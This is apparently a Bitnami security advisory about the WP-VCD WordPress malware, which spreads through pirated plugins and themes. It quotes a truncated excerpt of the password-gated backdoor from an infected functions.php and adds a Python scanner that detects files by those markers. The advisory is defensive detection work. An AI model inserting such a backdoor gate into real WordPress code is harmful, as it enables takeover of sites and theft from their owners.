2019-11-08 WordPress WP-VCD Malware via Pirated Plugins or Themes

We recently received several support requests about WordPress sites that went down without any apparent reason. After investigating these issues, we found that there is an ongoing attack known as WP-VCD. This infection is spread via “nulled”, or pirated, plugins and themes distributed by a network of related sites.

The Bitnami Team can confirm that none of these plugins are included in Bitnami solutions by default. So long as you did not install a “nulled” plugin or theme, your WordPress deployment is secure against this vulnerability.

Once users install an infected theme or plugin downloaded from these distribution sites, their WordPress installations are hacked and taken over within seconds. The malware executes a deployer script that injects a backdoor into all installed theme files and then resets each file's timestamps to their pre-injection values to evade detection. The code snippet below was sourced from an infected “functions.php” file on a site compromised by WP-VCD.

<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '2f3ad13e4908141130e292bf8aa67474'))
    {
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
    case 'change_domain';
    if (isset($_REQUEST['newdomain']))
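
Because the deployer restores file timestamps, looking for recently modified files will not reveal the injection; matching on file contents is more reliable. The following is an added example (not Bitnami's or Wordfence's code) that scans a theme directory for the three markers visible in the excerpt above. Generalising the password comparison to any 32-hex-digit literal is an assumption, and the files written by demo() are constructed sample data.

```python
import re
import sys
import tempfile
from pathlib import Path

# Markers copied from the infected functions.php excerpt on this page. The password
# check is generalised to any 32-hex-digit literal (assumption: variants keep that shape).
MARKERS = {
    "div_code_name": re.compile(rb"\$div_code_name\s*=\s*[\"']wp_vcd[\"']"),
    "password_gate": re.compile(
        rb"\$_REQUEST\[\s*['\"]password['\"]\s*\]\s*==\s*['\"][0-9a-f]{32}['\"]"),
    "change_domain": re.compile(rb"case\s+['\"]change_domain['\"]"),
}

def scan_file(path):
    """Return the sorted names of the markers found in one PHP file."""
    try:
        data = Path(path).read_bytes()
    except OSError:
        return []  # unreadable or missing file: nothing to report
    return sorted(name for name, rx in MARKERS.items() if rx.search(data))

def scan_tree(root):
    """Map each *.php file under root that contains a marker to its hits."""
    # Contents are inspected and mtimes ignored, since the deployer resets them.
    findings = {}
    for path in sorted(Path(root).rglob("*.php")):
        hits = scan_file(path)
        if hits:
            findings[path.relative_to(root).as_posix()] = hits
    return findings

def demo():
    """Scan a constructed two-theme tree: one infected file, one clean file."""
    infected = (b"<?php\nif (isset($_REQUEST['action']) && isset($_REQUEST['password'])"
                b" && ($_REQUEST['password'] == '2f3ad13e4908141130e292bf8aa67474'))\n"
                b"    {\n$div_code_name=\"wp_vcd\";\nswitch ($_REQUEST['action'])\n{\n"
                b"    case 'change_domain';\n")
    clean = b"<?php\nadd_action('after_setup_theme', 'mytheme_setup');\n"
    with tempfile.TemporaryDirectory() as tmp:
        for theme, body in (("theme-a", infected), ("theme-b", clean)):
            (Path(tmp) / theme).mkdir()
            (Path(tmp) / theme / "functions.php").write_bytes(body)
        return scan_tree(tmp)

if __name__ == "__main__":
    results = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else demo()
    for rel, hits in results.items():
        print(f"{rel}: {', '.join(hits)}")
```

Pass the path of the site's wp-content/themes directory as the first argument to scan a real installation. A file that matches any marker should be reviewed by hand, since this checks only the strings shown in the excerpt.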

You can find more information about this attack on the Wordfence site and in other security announcements like this one. Wordfence also provides a site cleaning guide for owners of infected sites and a detailed procedure for how to secure WordPress websites to prevent future attacks.

If you have further questions about Bitnami WordPress or this security issue, please post to our community forum and we will be happy to help you.

Last modification November 8, 2019